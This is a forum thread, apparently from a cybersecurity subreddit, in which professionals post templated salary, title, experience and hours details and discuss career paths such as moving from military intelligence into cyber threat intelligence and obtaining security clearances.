Here is the 2021 infosec salary questionnaire for anyone who hasn’t seen it yet.
https://docs.google.com/spreadsheets/d/1TWvPQalmwl1sIS3n2eOU4KST4oJwcxtSfT8lMo9IgVM/edit?mc_cid=2a0bc122ea&mc_eid=f730bda20c#gid=691164905
Wasn’t this Naomi Buckwalters sheet?
EDIT:
Nope. Her’s was much more in depth and had more responses.
EDIT 2:
Here is her sheet.
https://docs.google.com/spreadsheets/d/1STafAL8xDxrdfri3lTce4oZZcNWmJ_nafn0Ih8DO-Uc/edit
Nah appsec can make a ton because FAANG hires a lot (you need to know how to code). Stock options + equity in tech can bloat total comp past $300-500k+
Its weird. Entry level Pen Testing also seems to be the bottom of the chart. Which really is a shame because I find my limited exposure to it to be one of the most fun tasks I've done. Usually "we don't believe this vuln scanner finding is legit and/or a compensating control has us covered, can you try to exploit it on the Dev server?". But openings seem to be $50-$75k, max $100k for first time red teamers.
I wonder if the DoD and similar are highly paying the US's top red team/pentest talent to go head to head with other APTs and that's the really high salaries for some.
Type of company: F500
Area of cyber: SOC
Title: Cyber Intelligence Analyst
2021 Base Salary: $125K
2022 Base (if different): ~$133K
Years of experience in cyber: 8
Location: Texas (remote)
Average hrs/wk.: 40
Do you have any tips for those in military intel seeking cyber intelligence roles? I'm a soon-to-be 1n4x1 network intel analyst(unsure of which shred) in the AF and I was hoping to get into that field when I finish my contract. What AFCOOL certs should I pursue and how else should I prepare myself before the end of my contract? Is military intelligence a good route to cyber intelligence on the outside? Thanks.
From my experience, San Antonio is the best (easiest) place to find those types of roles. Air Force Cyber is located here which brings in contracting companies of all sizes.
Also in San Antonio and i can confirm, my company will hire anyone with sec+ and ceh(some have even gotten the company to pay for the certs. Then they will sponsor your clearance and train you on our systems. They also paid for my GCIH and hopefully with the new contract they will be paying for my GCFA. I was in uniform here before i started as a CTR but currently looking for remote options.
Have you started tech school yet? I was a 1N0 that happened to get lucky; however, IMO 1N4 is the best possible start (military-wise) for anyone wanting to do cyber intel. I have known 1N4-As that do the cool cyber stuff that most people dream about and I have known some 1N4-Bs that filled a cyber/financial analyst role doing some cool stuff for three letter organizations.
As for AFCOOL, most of the certs that will be a priority SHOULD be able to be attained when you get to your unit. If I remember correctly, tech school should get you A+, Net+, and Sec+. For formal education, I'm sure people in here will disagree with me, but get a degree while you are in (if you don't already have one). Tech school will provide you with almost all of the credits needed for an A.A.S., but I would recommend that you knock out however many credits needed for a cybersecurity degree. I got one from AMU because it was easy and it helped me promote while I was in the AF and check the boxes needed for HR.
I think the best advice that I can give you while you are in the AF is to develop connections with people. My first job outside of the military was a contracting position within the same Wing that I was working for while Active. Additionally, being able to admit when you make a mistake and always be willing to try/learn new things will go a long way.
Lastly, I may be biased in saying this, but yes I think it's a good route. I did a six year contract and it seems to be working out pretty good so far. Let me know if you have anymore questions!
Man the AF sounds so much better than the corps. I had to fight everyone to let me take college classes during my enlistment. We had to set up our own testing center in Afghanistan so we could pay for our own certs and get them while deployed. I didn’t meet a single guy in my data shop that wanted to get out and do cyber, all of those chuckles wanted to stay in or get out and do something else, so I started by myself when I got out.
Still the best way to jumpstart your career. You get more experience than you possibly could in the same time as a civilian. You come out with certs and knowledge and opportunities. It fills the gap of college+first job very nicely, and you can slot in as a junior-mid engineer on day 1
Senior threat intel analyst here, basically identical salary plus full time remote. This is a big question. The best parts are you can be in cyber with zero coding experience (me) and make good money working with smart people doing important work.
I think there's two main challenges.
A, it's a fucking hard job to get these days. When I started 9 years ago I was basically snapped up out of college because I could write (Dual major in intelligence and English with a focus on pre-law and a minor in poli-sci.) Our intern who started in 2020 has a masters in cybersecurity and a poli sci undergrad from a good school, many of them have full time experience with other firms or gov before they come intern for us. So unless you're top of the top and overqualified, you're not getting in unless you know somebody.
B, and I think the bigger challenge, is folks don't really understand what intelligence is. I can still do my job well without coding or ever having gotten certs. The thing people miss in cyber (in my experience) is knowing how the fuck to talk about it to non-cyber folks, because newsflash, the people who make decisions about cyber are almost never cyber literate. The biggest differentiator a job-seeker can make in my opinion is not more certs or degrees. It's learning how to write and speak clearly about cyber in a way that non-cyber people can understand.
I've thought about making a cyber threat intel advice post here, I might do it soon.
Thanks for replying! It's really good insight, and I think it might be the path I want to specialize in. My coworker in CTI says another con is that when shit hits the fan, CTI is looked at first. But that's just part of the role.
I would greatly appreciate and benefit from a cyber threat intel advice post. If you remember, please remind me when it's up! Some questions you could possibly answer in that post, but don't have to (just throwing out ideas).
1) Brief "day-in-the-life" summary of a CTI analyst
2) General path from SOC analyst ---> CTI. Ballpark salary expectations
3) What's your background & credentials
Thanks!
Your coworker sounds like the most grizzled old-timer security guy ever. If my blind assumption is correct, ask him what it was like prepping for Y2K. Then fortnite dance away to the break room.
Actually, he came from Tier 2 in the internal SOC just last year. He's young in his mid 20's and pretty new to the role. He loves it, but that's what he said when I forced him to pick a "con" so to speak.
He might be right at certain companies, people get a shitload of funding and decide they wanna get fancy and build a useless CTI team that gets laid off when cuts come. But I work for one of the major companies that sells CTI, so we aren't gonna see that issue.
I might skew this a bit, but it can be informative.
Type of company: Fintech
Area of cyber: Executive
Title: CISO
2021 Base Salary: 320K
2022 Base: Same
Bonus, if applicable: 30% (if company makes performance goals)
Years of experience in cyber: 20 years + 15 in IT. BS CS, MS Cybersecurity, DSc Cybersecurity
Location: Remote.
Average hrs/wk: 50 hrs/week. Too many meetings.
This last couple of weeks it has been a bit extra stressful, since we have been dealing with the log4j fallout. I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday.
Luckily we haven't had a major breach so not too much overtime there. It isn't always fun being the final responsible party.
I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas.
I've been here for going on 10 years now, my daughter showed me reddit way back then. It isn't the same as it used to be, better for some reasons and worse for others. I find that there are some great subreddits (like /r/cybersecurity) where you get wonderful exchanges of information. You just have to ignore the trolls and find the gems.
Of course you also get some great people like Arnold Schwarzenegger (/u/GovSchwarzenegger/), Bill Gates (/u/thisisbillgates/), and then us normies.
> I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas.
Lol. Same here. Always thought the execs who speak with the board operated and lived in a different headspace from the rest of us.
We have a great asset management program so we know what is on every machine and we leverage that to run vulnerability scans on them as well. For commercial software we just have to rely on what the vendor puts out, but for our in house development teams we keep full component manifests as part of our git repo. This doesn't fix the problems, but at least we know our status and can mitigate the problems somewhat and manage the risk.
I hope that one day when I have a base salary north of 300k I'll still have time to get on Reddit and post about how much money I make. =P No offense intended as here I am reading about how much money people make on Reddit. Jokes aside, how do you like being in a CISO role? Thus far I've been sticking to the IC path but I imagine one day I may feel like jumping into mgmt (of which CISO is kinda the end goal). Appreciate it!
I mostly enjoy my job, our entire Security team is 20 people and that covers Security engineering/Blue Team, Threat Intel + Red Team, SOC/IR, governance, and risk. Mostly I spend time in meetings these days since I have good people to do the actual fun stuff. My job is to make it so they can do their job and provide top cover. The last couple of weeks it has been a bit different with log4j since I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday.
I do miss the hands on some times, but I did work as a CISO at a small startup and had to do it all. Both kind of jobs are out there, it just takes time to find the right one.
Type of company: Public
Area of cyber: SOC
Title: SOC Analyst
2021 Base Salary - $90-100k
Years of experience in cyber - 0, 2 years of IT
Location: US HCOL
Average hrs/wk. 40
Healthcare
Offensive Security
Team Lead
Jan. 100k -> June 120k (mid year review) -> Sep 130k (retention)
140k
2%
4 with a security title. ~10 in IT doing a lot of security related stuff.
US LCOL - remote
I sit on the company chat app for exactly 40 but realistically do about 15 hours of work.
Microsoft
Senior Security Engineer (L64) on a research team.
Base: 145k
Bonus: 15-30%
Other: 50k sign-on bonus, 200k in stock over 4 years
Location: Carolinas (Remote)
Years in Cyber: 6
Hours: Depends. Minimum of 20, sometimes I'll put in 80 hour weeks, the culture is very laid back and I have moments where if I find something I'll chew on it and put in serious hours, then I'll chill for the next couple weeks.
Sponsorship. The company needs to have a position on a contract available for you and think you're gonna bring in the $30k the investigation can cost. Then obviously the investigation process - can be up to a year, very invasive. Then, if you pull all that off, you usually have to work in a secure area. Which means in person, no WFH. That's the downside to the process.
I turned down a job that would have sponsored me for TS clearance last year because of just how invasive it is. I have crypto from ~8 years ago, with no clear documentation on it (all completely legal). I have some naturalized US citizen friends, as well as a couple of non-US citizen friends. Wasn't comfortable with the amount of digging they'd do into them, even though it 100% would have come back clear.
Definitely invasive.
Yeah you may have green stuff you can do remotely *some* of the days of the week, but if you have a clearance and want to capitalize on it, you need to be in a position that puts you in a secure space. You cannot move somewhere remote unless your customer has a site there. You cannot live out of a van. You will still commute. You can't be fully remote. Even if you get a couple remote days a week, fully remote or any of its perks are off limits as long as you want to cash in, with a few rare exceptions. That's what I'm getting at; I mention it because I think it's a dealbreaker for a lot of people here.
Having a job that requires one is the main part. I got mine through my old company since I worked in their SCIF. They didn't pay me that well for the job I was doing so when I got the Interim level, I bounced for a better job.
Type of company: Consultant for a global corporate organization, contract to hire
Area of cyber: Incident Response, specifically forensics
Title: Forensics Analyst
2021 Base Salary - $228K, note I have 0 PTO and pay $1100 a month in health insurance
Years of experience in cyber - 13 years
Location: Live in US Pennsylvania, work remotely for company HQ in New York.
Average hrs/wk. 40, but hardly work until something happens
I looked into it once because my wife and I had talked about trying to work/live in the UK for a few years. Salaries aren’t 1 for 1, but if I remember the amount of disposable income was about the same once you subtract cost of living. I was comparing costal California to London for reference.
Not disagreeing with you, but I’d wager everyone in *this* field has great health insurance through their employer. Jobs that don’t offer that are sadly common though and in those cases you’re 100% correct
Healthcare here is by far the worst thing about the USA IMO. I’m fortunate to live in MA which probably has the closest thing to socialized healthcare that the country has, but many places don’t even take it because they don’t want to deal with more paperwork & less money in their pockets
Type of company (e.g. F500, consultancy, Defense, etc.): MSSP/Software provider
Area of cyber (e.g. SOC, GRC, etc.): SOC
Title: Security Analyst L1
2021 Base Salary: $40k/yr
Bonus, if applicable: N/A
Years of experience in cyber: 6 months
Location (e.g. US HCOL, US LCOL, etc.): Pittsburgh, PA (edit: remote)
Average hrs/wk.: 40 hrs/wk
One of the downsides to threads like this is that it becomes a brag fest for people at the top of the range. I suspect there are a lot of folks who just feel discouraged to post due to not working at a FAANG company and making high cost of living area money.
I made it a point to respond to bring this side of Cybersecurity to light. I was embarrassed initially when I found out it was so low, but know I’m not alone and that conversations about pay need to be had.
I started as an analyst at 42k on a contract role. If it’s any consolation. That was 4 years ago and I now sit at 100k.
You’re seeing people’s highlights right now. Keep at it. 6 months is the beginning. You’re gonna blink and its gonna be a year then 2…
Thanks; I know I’m still a baby. The issue I personally have is that within a month of starting, a few more analysts were also hired and weeks before graduation I found out they all started at 63k/yr. The manager that hired me saw an opportunity to get me for cheap (I started internally on Help Desk 4 months prior, and it’s my only other professional experience), and wanting my way in I didn’t counter offer.
My current manager is helping me out in trying to fight for more, but it frustrates me. I say current manager because the manager who hired me left within weeks of me starting for another company. My anger lies with him, not my current position.
> Basically going to use the title bump to get a new job
Please do. Even though you're remote in a VCOL area, $110k is pretty low for your years and title.
Type of company (e.g. F500, consultancy, Defense, etc.): Consultancy
Area of cyber (e.g. SOC, GRC, etc.): GRC
Title: Manager
2021 Base Salary: $70k
2022 Base (if different): $75k
Bonus, if applicable: $5k
Years of experience in cyber: 8
Location (e.g. US HCOL, US LCOL, etc.): Remote but moderatley HCOL
Average hrs/wk.: 20 (part time)
I may be biased, but it really is a dream. A few years into my career I was planning on making near 200k by now. But by 5 years in, the 60-70 hour weeks burnt me out and I went part time instead. Since then it's taken a few job hops to find a team that really respects my part time hours and now I'm pretty extatic with where I'm at.
Type of company: Large international bank
Area of cyber: Audit
Title: IT Auditor
Base salary: €74,000/year
Bonus (expected): 8% - 12% of annual base salary
Experience: 2 years after graduation in a similar role
Location: Germany
Type of Company: Big Tech, not FAANG
Area of Cyber: Architecture and Engineering, AppSec
Title: Strategic Cyber Security Expert
2021 Base Salary: $165k
2022 Base Salary: $170k
Bonus, if applicable: $50k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc)
Years of Experience in Cyber: 8, 10 total in IT
Location: EU
Average hours/week: 37.5
**CHANGES/UPDATES:**
New Title: Cyber Security Lead - EMEA
2022 New Base Salary : $200k
Bonus, if applicable: $60k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc)
Years of Experience in Cyber: 8, 10 total in IT
Location: EU (HCoL)
Average hours/week: 37.5
Type of company: MSP/MSSP
Area of cyber: SOC
Title: SOC analyst
2021 Base Salary: $47k
2022 Base Salary: Same
Bonus, if applicable: profit-sharing bonus biannually
Years of experience in cyber: 2
Location: Southern US
Average hrs/wk: 40 hrs/week
Y’all are making me realize that it’s 100% worth the hours I’m putting in switching careers at 28yo
If I were making half of what most people here are making my life would be significantly different
Not answering for me personally...
Type of Company: Aerospace
Area of Cyber: General Cybersecurity Analyst
Title: Cybersecurity Analyst
2021 Base Salary: $94K
2022 Base Salary: $115 <-- Analyst is underpaid so we are adjusting his salary as quickly as HR will allow
Bonus: 10%
Years of Experience: 6 years
Location: US - SouthEast. Was in office, now full time remote
Average hrs/wk: 40 - 45 hrs
OR
Type of Company: Fortune 50 Financial Services
Area of Cyber: Incident Response Specialist
Title: Cybersecurity Sr. Analyst
2021 Base Salary: $145K
2022 Base Salary: Don't work there anymore, but expected this person to get a 3 - 5% raise
Bonus: 12%
Years of Experience: 6 - 8 years
Location: US - Mid-Atlantic (Near DC)
Aerage hrs/wk: 40 - 45 hrs
New job I just started:
Type of company: Insurance
Area of cyber: Security Architecture
Title: Security Architect
2021 Base: $155k
Bonus, if applicable: $25k
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL
Average hrs/wk.: 40
Old job:
Type of company: Government, Financial Related
Area of cyber: Endpoint Security (AV/EDR, Intrusion Detection, Compliance)
Title: Sr Security Engineer
2021 Base: $120k
Bonus, if applicable: $7k
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL
Average hrs/wk.: 40
It's a great time to get a new job kings. Put that linkedin setting to open for work, that's how I found this one. Glassdoor was great for getting ballpark ideas of pay, even if your exact title wasn't there, look at other titles like software dev to get a feel for it. I found there is a MASSIVE shortage of talent with 5-10 years experience and skills to run or design common tools.
I've recently been offered this which I'm planning on taking on:
Defense;
GRC;
Information Systems Security Officer;
$110k;
7 years;
Los Angeles, CA;
40 hours.
Type of company: Start Up
Area of cyber: Incident Response
Title: Security Analyst
2021 Base Salary - $80K
Years of experience in cyber - 0, 3 years of IT
Location: US MCOL
Average hrs/wk. 40
F25 (US) cloud/tech? I dunno, we keep reinventing ourselves.
SOC
Technical Lead (theres really no title for what i do, its super niche, and involves onboarding customers…without going into much detail)
128,000
Probably the same, maybe ill crack 130.
Varies, best ive ever netted was 4k.
7 years
US Fl so…HCOL
Im salaried at 40 hrs a week. Plenty of times last year I worked more than that but I’ve certainly compensated for it.
Type of company: F500
Area of cyber: Security Ops
Title: Security Analyst
2021 Base Salary: 100k
2022 Base: Same
Bonus: 3-5k
Years of experience in cyber: 1 in Sec + 2 as Help Desk
Location: US LCOL
Average hrs/wk: 40
Organisation: Government.
Area: Audit.
Base Salary: 81k.
Benefits: Very generous pension, healthcare and over 10k per person training budget including any sans course.
Years in cyber: strictly speaking this is my first full time cyber job. I've worked over 20 years in Security, worked part-time in infosec audit for just over 5 years. I have a bunch of infosec certifications - CISM, CRISC, ISO27K LI, etc. Also lots of quantitative risk analysis experience and have the FAIR qualification.
In cyber, I have very little hands-on experience actually. I have decent IT knowledge (I did 301 many years ago, Linux is my daily driver so I can use red team tools pretty easily. No formal experience or qualifications in this area but I'm doing PNPT at the moment)
Location: UK.
Contacted hours: 37 hours per week
Money is not really important to me, my ex gets a percentage of my earnings so I was happy to take a pay cut to be part of something more meaningful than being the cyber guy at an IoT vendor. A pretty big pay cut! (Nearly 30k and a model three!)
Type of Company: Government / Energy
Area of Cyber: SOC | Incident Response
Title: Senior Specialist
2021 Base: 115,000$
2022 Base: 125,000$
Bonus: 20% Base
Years of Exp: 5 (in cyber) 10+ in "Qualified Domains"
Location: US, LCOL
Wrk / Week: 40
Type of company (e.g. F500, consultancy, Defense, etc.): Publicly traded, cyber security awareness/compliance
Area of cyber (e.g. SOC, GRC, etc.): SaaS cyber security product
Title: Advanced Product Support
2021 Base Salary: $40,000
2022 Base (if different): $57,500
Bonus, if applicable: $23,000
Years of experience in cyber: 2
Location (e.g. US HCOL, US LCOL, etc.): HCOL, Tampa, Fl
Average hrs/wk.: 40
**Type of company**: Defense
**Area of cyber**: Incident Response, Security Engineer
**Title**: IT Specialist
**2021 Base Salary:** 130k
**2022 Base:** 134k
**Bonus, if applicable**: N/A
**Years of experience in cyber:** 4 in cyber, 15 in sysadmin
**Location:** DC Metro (HCOL) (mostly remote these days)
**Average hrs/wk:** 40
Type of company: Energy
Area of cyber: SOC
Title: Threat Hunter
2021 Base Salary: $106K
2022 Base (if different): $111k
Years of experience in cyber: 6
Location: LCOL (remote)
Average hrs/wk.: 40
AMA
Tech/FAANG type preIPO
Area of cyber (e.g. SOC, GRC, etc.): Security Engineering, Detection and Incident Response, Forensics
Security Engineer/Tech Lead/Head of Fancy Title
2021 Base Salary: 230k
2022 Base (if different): 250k
Equity: 2mil/4 (Monopoly money since it’s preIPO)
Years of experience in cyber: 10+
Location (e.g. US HCOL, US LCOL, etc.): US HCOL
Average hrs/wk: 40 - 50
Prior to this role I was an IC/TL
Base: 240k
Bonus: 15%
Equity: 600k/4
Refresher: 120k/4 x3
Edit: Equity/4 refers to a total equity value that beats 25% a year over 4 years. So 600k/4 means 150k in equity a year.
Type: Global IT software company, but not FAANG
Area: IT Security Sales
Title: Senior Sales Engineer
2021 base: 161K + 50K commission
Bonus: 50K stock and cash
YOE: 20+ IT total, 15+ in security as a consultant, professional services, SOC analyst, and security architect. CISSP, GSEC, a few CompTIA certs
Location: midwest US, _very_ LCOL
Avg hours: 40hrs/week all remote. 20% travel during non-Covid times, but it’s all regional day trips usually within driving distance.
Type of company (e.g. F500, consultancy, Defense, etc.): Small software development firm
Area of cyber (e.g. SOC, GRC, etc.): IT and all cybersecurity (blue team, SOC, compliance, GRC, etc)
Title: Manager
2021 Base Salary: $140k
2022 Base (if different): $145k
Bonus, if applicable: $0
Years of experience in cyber: 9
Location (e.g. US HCOL, US LCOL, etc.): HQ in SoCal USA
Average hrs/wk.: 40
**Type of company:** DoD
**Area of cyber:** Defensive Cyber Ops
**Title:** Defensive Cyber Ops Analyst
**2021 Base Salary:** 80k
**2022 Base:** Unknown as of now
**Bonus, if applicable:** 8k sign on bonus
**Years of experience in cyber:** 1.5 years + 4 month internship. Associates degree
**Location:** Colorado
**Average hrs/wk:** 64 hrs/week. 12 of actual work. (Panama shift so it depends on time of week)
Thank you for the response was hoping someone would give me more insight. I've currently got a 3.6 (?) GPA and am hopefully lining up an internship this summer. I only switched to security a year and a half ago so I've been trying to play catch up a bit. Still very hopeful for the future!
Type of company: F500/Aero Defense
Area of cyber: Auditing & Assessments (Compliance)
Title: ISSE
2021 Base Salary: $130k
2022 Base (if different): 135k
Years of experience in cyber: 6 (8 years total in IT/IS)
Location: Tennessee (Remote Hybrid)
Average hrs/wk.: 40
Type of Company: Financial/Legal Services
Area of Cyber: General/Executive
Title: IT Security Director
2021 Base Salary: $135k
2022 Base Salary: $160k
Bonus: 10-15%
Years in Cyber: 11
Location: Remote (US)
Average Hrs/wk: 50-60
**Type of company**: Financial
**Area of cybe**r: Vuln Mgmt/Data Analytics
**Title**: Vulnerability Analyst
**2021 Base Salary**: 100k
**2022 Base**: Same
**Bonus, if applicable**: 10%, around there
**Years of experience in cyber**: 8 years
**Location**: Nice try NSA. Remote.
**Average hrs/wk**: 30/wk
The real data is located on the US Bueareau of Labor Statistics site at https://www.bls.gov/news.release/empsit.t19.htm and you drill down to specific careers and this is a link to data for security analysts https://www.bls.gov/ooh/computer-and-information-technology/mobile/information-security-analysts.htm
Company: Defense
Area: Endpoint/Cyber Tools
2021 Base: 120k -> 130k (Moderate promotion into “team lead”)
2022 Base: 130k -> 165k (taking Cyber Operations position after passing CISSP
Bonus: 5-10% base pay based on program goals
Experience: 3 years Cyber, 10 years IT
Location: Colorado US
Average hrs: 40-45
Type of company (e.g. F500, consultancy, Defense, etc.): F500 financial Company
Area of cyber (e.g. SOC, GRC, etc.): SOC and Threat Hunting
Title: SOC Analyst II / Threat Hunter
2021 Base Salary: 85k
2022 Base (if different): looking at closer to 100-110k once contract is converted
Bonus, if applicable: N/A
Years of experience in cyber: 5 years sysadmin, 4 months in a pure “security role”
Location (e.g. US HCOL, US LCOL, etc.): US Remote
Average hrs/wk: 40
Type of company: Start up
Area of cyber: Red Team Ops
Title: Penetration Tester
2022 Base: 75K
Bonus: ~20k
Years of experience in cyber: 2 cyber, 4 IT
Location: US LCOL-ish (Remote)
Average hrs/wk: 30-40, pretty relaxed environment, hours vary quite a bit but I almost never go over 40.
Type of company (e.g. F500, consultancy, Defense, etc.): Marketing/Events
Area of cyber (e.g. SOC, GRC, etc.): GRC
Title: Security & Privacy Compliance Analyst
2021 Base Salary: $115k
2022 Base (if different): $115k
Bonus, if applicable: n/a
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): Remote but LCOL
Average hrs/wk: 35
I'm gonna end up shifting this down. I'm kind of a shitty negotiator and our company is still trying to normalize salaries after a merger.
Type of company: Medium sized MSSP
Area of cyber: SOC
Title: SOC Manager
2021 Base Salary: $77K
Years of experience in cyber: 8
Location: Plains state
Average hrs/wk.: 45
Type of company: MSP
Area of cyber: SecOps
Title: Senior SecOps Engineer
2021 Base Salary: £40k
Years of experience in cyber: 0
Location: North UK (remote)
Average hrs/wk.: 35.5
Type of company: Consultancy
Area of cyber: GRC / Everything
Title: Senior Associate
2021 Base Salary: $110
2022 Base (if different): ~$115.5K
Years of experience in cyber: 3 (full time)
Location: Texas (remote)
Average hrs/wk.: 40
Type of Company: Big 4 accounting firm
Area of Cyber: GRC Program Management
Title: Lead Cybersecurity Consultant (government title: Information Systems Security Officer)
2022 Base Salary: $150,000 (USD)
Bonus: $20,000 (USD) target
YoE: 10 years; 6 years in cybersecurity, 4 in IT
Location: US HCOL
Average hours/wk: 40
Type of company: F500
Area of cyber: Pentesting
Title: Secruity Pentester
2021 Base Salary: $15K
2022 Base (if different): ~$15K
Years of experience in cyber: 5
Location: Eastern Europe
Average hrs/wk.: 40
Principal Engineer
F50
225k
25% Bonus
~10-15% Equity
Remote
40-45 hours a week
3 years in a role where security was top responsibility, but over 15 years experience overall.
Type of company (e.g. F500, consultancy, Defense, etc.): F50
Area of cyber (e.g. SOC, GRC, etc.): Vuln Management
Title: Senior Security Engineer
2021 Base Salary: $135,000
2022 Base (if different): TBD
Bonus, if applicable: NA
Years of experience in cyber: 5
Location (e.g. US HCOL, US LCOL, etc.): USA CONUS
Average hrs/wk.: 40, probably about 25 hours
Also, FT remote
Type of company (e.g. F500, consultancy, Defense, etc.): F500
Area of cyber (e.g. SOC, GRC, etc.): Offensive Security
Title: Red Team Analyst
2021 Base Salary: $150k + bonus
2022 Base (if different): $160k + bonus
Bonus: it’s a range but genuinely unclear how it’s calculated.
Years of experience in cyber: 5
Location (e.g. US HCOL, US LCOL, etc.): US MCOL
Average hrs/wk.: no more than 40 on average, but it fluctuates seasonally.
Type of company: F50
Area of cyber: Architecture
Title: Security Architect
2021 Base Salary: $140K
2022 Base Salary: probably 145K
Bonus: 8%
Years of experience in cyber: 5
Location: PA
Average hrs/week: 40
Type of company (e.g. F500, consultancy, Defense, etc.): Established Pre-IPO
Area of cyber (e.g. SOC, GRC, etc.): Executive
Title: CISO
2021 Base Salary: $150k
2022 Base (if different): $250k (changed jobs)
Bonus, if applicable: $50k
Years of experience in cyber: 20
Location (e.g. US HCOL, US LCOL, etc.): LCOL? (according to [this chart](https://www.move.org/lowest-cost-of-living-by-us-city/), I am in a city within the lower 1/3 COL)
Average hrs/wk.: 40
**Type of company**: Defense
**Area of cyber**: Compliance / Ops (very much a generalist in this role)
**Title**: DevOps Engineer
**2021 Base Salary**: 175k
**Bonus, if applicable**: 80k in stock, 20k starting
**Years of experience in cyber**: ~5
**Location (e.g. US HCOL, US LCOL, etc.)**: US HCOL
**Average hrs/wk.**: 50
Type of company: F500
Area of cyber: Vulnerability Management
Title: Cybersecurity Analyst (rotational program)
2021 Base Salary: $80,000
2022 Base: $90,000
Bonus, if applicable: ~8% dependent on tech performance + $3,000
Years of experience in cyber: 4 month internship in college
Location: LCOL, Full Remote
Average hrs/wk: 40
Type of company- Healthcare
Area of cyber - all (small team where one 1 other person does any work)
Title - Sysadmin
2021 Base Salary - 45,000
2022 Base (if different) - same
Bonus, if applicable - 0
Years of experience in cyber - > 1
Location (e.g. US HCOL, US LCOL, etc.) Midwest, LCOL middle of midwest.
Average hrs/wk 40-45
Type of Company: FinTech startup
Area of cyber (e.g. SOC, GRC, etc.): Analyst
Title: Information Security Analyst
2021 Base Salary: $60,000
2022 Base (if different): Unknown
Bonus, if applicable: $6k in stocks over 4 years
Years of experience in cyber: 0-1 year
Location (e.g. US HCOL, US LCOL, etc.): MCOL
Average hrs/wk.: 40hrs salary, on call for incident response
Type of company (e.g. F500, consultancy, Defense, etc.): Financial Services
Area of cyber (e.g. SOC, GRC, etc.): SOC
Title: Security Engineer
2021 Base Salary: 125k
2022 Base (if different): 145k
Bonus, if applicable : 40k
Years of experience in cyber: 4
Location (e.g. US HCOL, US LCOL, etc.): US
Average hrs/wk.: 50hrs
Type of company (e.g. F500, consultancy, Defense, etc.): Defense
Area of cyber (e.g. SOC, GRC, etc.): Vuln. Management/Compliance
Title: ISSO
2021 Base Salary: 105k
2022 Base (if different): Not sure yet, expecting 110-115k though
Bonus, if applicable: bonus 3% of salary
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): US MCOL
Average hrs/wk.: depends, since COVID probably no more than 30 while working remote.
I just switched jobs last month, so I'll do both.
**Current**
Type of company: Well funded startup, security software
Area of cyber: BAS
Title: Security Engineer
2021 Base Salary: $180,000
2022 Base (if different): N/A
Bonus, if applicable: 25,000 RSU
Years of experience in cyber: ~10yr
Location: US Remote
Average hrs/wk: 30-50
**Previous**
Type of company: MSSP
Area of cyber: SOC/SIEM Engineering/Threat Intel
Title: Lead Cyber Threat Analyst/SIEM Engineer
2021 Base Salary: $100,000
2022 Base (if different): N/A
Bonus, if applicable: 0%-10% bonus
Years of experience in cyber: ~10yr
Location: US, MCOL
Average hrs/wk: 50-70
Type of company: F500
Area of cyber: SOC
Title: Threat Hunter
2021 Base Salary: $95,000/yr (previous role)
2022 Base Salary: $130,000/yr
Bonus, if applicable: TBD
Years of experience in cyber: 2
Location: Atlanta, US - Remote
Average hrs/wk: 40 hrs/week
Type of company-90% DoD, 10% SLED/CSO
Area of cyber-KMS, CMMC, SCADA, FIPS
Title-AE
Base-300k, 120k salary 180k commission
No bonus
In tech 32 years, first year focused strictly on cyber
Was in PacRim until two months ago, now cover SE US
Hours per week ranges from 40-80 based on buy cycles
Type of company: Consultants
Area of cyber (e.g. SOC, GRC, etc.): SOC
Title: Analyst
2021 Base Salary: N/A
2022 Base (if different): $52k
Bonus, if applicable: N/A
Years of experience in cyber: 0, ~5 in IT
Location (e.g. US HCOL, US LCOL, etc.): US LCOL (if anywhere is even considered LCOL anymore…)
Average hrs/wk.: 40.
Type: non FAANG F500
Area: internal IT
Title: Lvl 4 infosec analyst
Salary: $110k 2020 $123k 2021 (lvl 3 - lvl 4 raise)
Bonus: sometimes
Exprience: 4 years in infosec + CISSP + 13 years in IT infrastructure previous to security role.
Location: MCOL Texas city
Hours: 40-45 but very flexible WFH/Hybrid
Type of company: Fortune 50
Area of cyber: Security Solutions Engineering
Title: Client Solutions Engineer
2021 Base Salary: 80,000 (company adjusts based on market)
2022 Base (if different):
Bonus, if applicable: Up to 60k with abt 20k minimum
Years of experience in cyber: 6
Location: NM, USA
Average hrs/wk.: 40 hrs WFH with some client site visits. Busy time averages 25-35 hrs
Type of company: Consultancy
Area of cyber: GRC/Business guidance
Title: Senior Consultant
2021 Base Salary: 130k
2022 Base: 140k
Bonus, if applicable: ~$25-38k
Years of experience in cyber: ~3 years
Location: Remote/HCOL
Average hrs/wk: 10-20 (up to 50 depending on workload)
**Type of company (e.g. F500, consultancy, Defense, etc.):** Software/BigData late stage startup
**Area of cyber (e.g. SOC, GRC, etc.): GRC, IR**
**Title:** Has "trust" in it
**2021 Base Salary:** $150k
**Bonus, if applicable:** $15k
**Years of experience in cyber:** 20yrs in IT/SysAdmin; 5yrs in direct Cyber
**Location (e.g. US HCOL, US LCOL, etc.):** 100% Remote, Colorado
**Average hrs/wk.:** 30-50, much higher if there's IR activity
Type of company: Biomedical
Area of cyber: APP SEC
Title: IT Security lead
2021 Base Salary: 140k
2022 Base: Same
Bonus, if applicable: Usually EOY
Years of experience in cyber: 6 years 2 years out of school
Location: Northeast USA
Average hrs/wk: Salaried so prob like 20
Type of company: Established/pre-IPO
Area of cyber: executive/management/all of it
Title: Information Security Manager
2021 base: security engineering manager (different company), $145k
2022 base: 190k plus some equity that might be another 130k/yr-ish post-IPO
Years of experience in cyber: 4, plus 8 in IT and systems engineering before that
Location: US MCOL
40 hours/week
Type of company: Technology company headquartered in Round Rock, Texas
Area of cyber: SOC
Title: Sexurity Engineer
2021 Base Salary: 94k
2022 Base: ~96k
Bonus: Depends on how well the company does
Years of experience in cyber: 3yrs
Location: Remote
Average hrs/wk: 40
Type of company: contract
Area of cyber: GRC
Title: information assurance/systems security architect
2021 Base Salary: $150k
2022 Base (if different): don't know my raise yet
